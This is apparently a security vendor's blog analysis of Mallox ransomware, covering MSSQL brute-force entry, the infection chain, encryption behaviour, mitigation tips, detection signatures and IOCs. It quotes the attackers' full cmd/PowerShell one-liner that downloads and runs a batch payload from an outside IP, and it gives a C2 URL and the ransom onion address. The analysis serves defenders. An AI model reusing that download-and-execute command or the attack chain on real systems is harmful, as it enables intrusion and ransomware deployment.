Introduction:
First observed in the middle of 2021, Mallox Ransomware has emerged as a formidable threat in the cybercrime landscape. With its ability to encrypt all volumes, including local and network-shared drives, it gradually spreads control over the system, leaving victims in digital despair.
Mallox Ransomware uses the “.mallox” extension on the encrypted files as it drops its ‘ransom note’ with the name – “File Recovery.txt,” which contains the unique “tor” link for further communication between the attacker and the unsuspecting users.
In this blog, we will take you deep into our research of the Mallox Ransomware, to help you understand how stealthily it works, as well as update you on how to stay protected.
Attack Vector:
Our investigation indicates that Mallox (aka TargetCompany) Ransomware is currently targeting unsecured Microsoft SQL Servers as an attack vector to infiltrate victims’ systems and distribute the ransomware.
Furthermore, we have noticed multiple failed and erroneous attempts on publicly exposed MSSQL servers to gain initial access to the victims’ network. This pattern indicates MSSQL brute force attacks and highlights these servers’ pivotal role as the primary point of entry into the victim’s system.
It is observed that, as it gains initial access to the unsecured MSSQL instance via brute force attacks, it uses the MSSQL service ‘sqlservr.exe’ command line to infiltrate the malicious files and payload onto the victim’s machine.
“C:\WINDOWS\\System32\\cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%\tzt.bat”) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create “%TEMP%\tzt.bat”
Infection Chain:
During the execution of tzt.bat, it injects the ransom code in the Aspnet_Complier.exe, and then drops and executes the killer.bat file, which deletes all the unwanted services and kills all the tasks so that the encryption process is successful.
Fig: Infection chain
Technical Analysis Of Payload:
The Bat file executes the .NET payload “Mfhigwwvise.exe,” which is responsible for the injection of ransomware code.
During the analysis of the .NET payload, it was discovered that it downloads another encrypted VDF payload from the “hxxps://files.catbox.moe/r6piiq.vdf, which is encrypted with AES Cipher – As shown in the figure below.
This further decrypts directly into the memory.
Fig: Downloading VDF from C2
Fig: Decrypted VDF payload
The Decrypted DLL file is further obfuscated with an IntelliLock obfuscator. The loader now loads the decrypted ransomware DLL into another process using the process hollowing technique.
After creating the thread pool, the loader uses the InvokeMember() function to inject and execute the ransomware code into Aspnet_Compler.exe.
Fig: Invokes the DLL function
Technical Analysis Of Injected Ransom Code:
The injected payload of the Mallox Ransomware is the main module that contains the country check, Deletion of the shadow copy, Termination of running processes, and encryption.
Firstly, It checks the default language ID for the current user to exclude some countries from the targeted attack.
Fig: Checks for Lang ID
It then creates the threads. The first thread will delete the Registry keys, and then the Shadow copy, as shown below.
Fig: Deletion of Registry keys
Fig: Deletion of shadow copy
The second thread will modify the Boot Configuration and terminate some hardcoded processes.
Fig: Use of BCD cmd for boot configuration
Fig: Termination of process
After this, the third thread will remove SQL-Related Services’ used command line. As shown in the figure below:
Fig: Remove SQL-Related Services
Upon attempting to shut down or reboot the PC, it displays a warning message to the user stating: ‘Do NOT shut down OR reboot your PC: this might damage your files permanently!’
It modifies the Windows registry to prevent users from shutting down or restarting the system. Configuring specific registry values disables the Shutdown, Restart, and Sign-out options, effectively blocking users from performing these actions.
Fig: Disables the system options
Exfiltration System Information
Mallox Ransomware can exfiltrate data from a targeted system prior to its encryption. Like the prevailing approach of numerous other contemporary ransomware groups, it operates a website to expose data owned by victims who refuse to meet ransom demands. It collects system information and transfers it to the C2C.
Fig: Exfiltration of data targeted system
Fig: Connection to C2 server
Encryption:
Encryption threads are created based on the number of existing processors, with a maximum limit of 64 threads.
Fig: Encryption threads w.r.t No. Of processor
Folders And Files Exclusion:
It traverses all the directories using API FindFirstFileExW. It excludes files, folders, and extensions.
It also excludes the ransom note “File Recovery.txt” from the encryption process.
Fig: Comparing with safelisted folders
Fig: Comparing with safelisted ext.
Fig: Comparing with safelisted files
Fig: Comparing with safelisted files
The Ransomware note, labelled “File Recovery.txt,” is created in all the folders. This note provides an Onion link for communication with the attackers for decryption, as shown below:
Run The TOR Browser And Open The Site:
Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[/]mallox[/]privateSignin
Fig: Creating ransom notes
It uses the sala20 Encryption algorithm to encrypt the samples
After encryption, it appends “.Mallox” as a file extension.
Tips To Prevent Such Kinds Of Attacks:
Securing Microsoft SQL Server instances is crucial to prevent Mallox Ransomware attacks. Follow these recommended steps to enhance the security of your SQL Server environment:
- Firewall Protection/Limiting Access: Utilize a firewall to restrict access to SQL servers. Allow incoming traffic only from trusted networks and IPs. Specifically, block incoming traffic on port 1433 except for authorized users.
- Change Default Port: Avoid exposing SQL Servers on the default port (1433) over the Internet, as it’s a common target for hackers. Consider using a secure connection like a VPN for accessing SQL servers remotely.
- Secure Account Management: Disable the ‘sa’ (system administrator) account or set a strong, unique password to minimize unauthorized access risks. The sa account holds high privileges.
- Strong Passwords: Enforce strong, unique passwords for all SQL logins. Utilize a mix of upper- and lower-case letters, numbers, and special characters to enhance password security.
- Account Lockout Policies: Implement account lockout policies that temporarily lock out SQL Server logins after multiple failed attempts. This deters brute force attacks.
- Audit SQL CLR Assemblies: Review and deactivate SQL CLR assemblies that are not essential. Routinely assess and remove any redundant assemblies to mitigate potential vulnerabilities.
- Encrypt Data in Transit: Utilize SSL/TLS protocols to encrypt data during transmission between clients and SQL servers. This safeguards against potential eavesdropping and data interception.
- Keep an Eye on SQL Server Activity: Utilize SQL Server auditing to meticulously track and log every operation within your SQL Server instance. By actively monitoring these activities, you can swiftly detect and address any potential security risks.
- Stay Updated: Regularly apply the latest updates and patches to your SQL Server instance, Operating System and other installed applications. This helps mitigate known vulnerabilities and ensures ongoing security.
Precautionary Measures For Minimizing Shared Data Damage Within The Network:
- Restricting Access to Shared Folders: Use network separation to limit access to shared folders only to those who need it. Apply strong access controls to ensure that only authorized individuals can change shared data on the network.
- Regular Data Backups: Consistently back shared data to a secure and isolated location. Periodically test backups to verify data integrity and to ensure a swift data restoration process in the event of an attack.
- Scheduled Offline Backups: Maintain offline backups of critical shared data to protect against ransomware attacks that may attempt to encrypt live/online backups.
By adhering to these precautions, we can significantly reduce the risk of Mallox Ransomware attacks targeting Microsoft SQL Server instances and bolster the overall security posture of our environment.
How Does SEQRITE Protect Its Customers From Mallox Ransomware?
SEQRITE’s AntiVirus has signatures for various script files utilized in the attack, as well as for the Ransom payload. The signatures against this Ransomware are as indicated below:
- Ransom.Mallox.S28994722
- PS.Downloader.Boxter.47436
- BAT.Agent.CQ
- Script.Trojan-Downloader.A8341828
- Script.Trojan.A8269601
To Know More About SEQRITE’s Range Of Digital Protection, Please Visit –
Conclusion:
As cyber threats grow in sophistication, the Mallox Ransomware emerges as a stealthy and ever-evolving adversary.
Its strategy is clear, to target unguarded MSSQL Servers as its starting point. Once inside, it unleashes a complex infection chain using the combination of malicious files to inject chaos into the system’s processes under the shroud of encryption.
The Mallox Ransomware, with its intricate threads of malevolence, preys on vulnerability, turning your digital world into a high-stakes battleground. A typical digital hostage situation, where the demand is clear – your precious data or payment for freedom!
SEQRITE’s signature-based protection offers defense against this ransomware variant.
MITRE ATT&CK TTPs:
Command and Scripting Interpreter | T1059 |
Inhibit System Recovery | T1490 |
File and Directory Discovery | T1083 |
System Information Discovery | T1082 |
Data Encrypted for Impact | T1486 |
Service Stop | T1489 |
IOCs:
Bat loader:
77BFCEE98F086C8E25A69D252A6609E1
08D4D184E6E3484E8B676FA0E0A24AFA
Payload:
1B7578D04324CD6C8BF11985B79A814A
Authors:
Soumen Burma
Vaibhav Billade
Umar Khan
No Comments